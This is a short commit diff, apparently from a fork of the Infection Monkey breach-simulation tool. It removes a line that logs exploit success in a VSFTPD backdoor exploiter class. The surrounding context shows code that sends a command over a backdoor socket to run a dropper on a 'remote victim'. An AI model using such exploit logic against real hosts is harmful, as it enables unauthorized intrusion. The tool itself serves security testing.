forked from p15670423/monkey
parent
feb4fea19e
commit
595a089e60
|
@ -134,7 +134,6 @@ class VSFTPDExploiter(HostExploiter):
|
|||
time.sleep(FTP_TIME_BUFFER)
|
||||
if backdoor_socket.send(run_monkey):
|
||||
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", self._config.dropper_target_path_linux, self.host, run_monkey)
|
||||
self._exploit_info['Vulnerability'] = {"Success":"True"}
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
|
|
Loading…
Reference in New Issue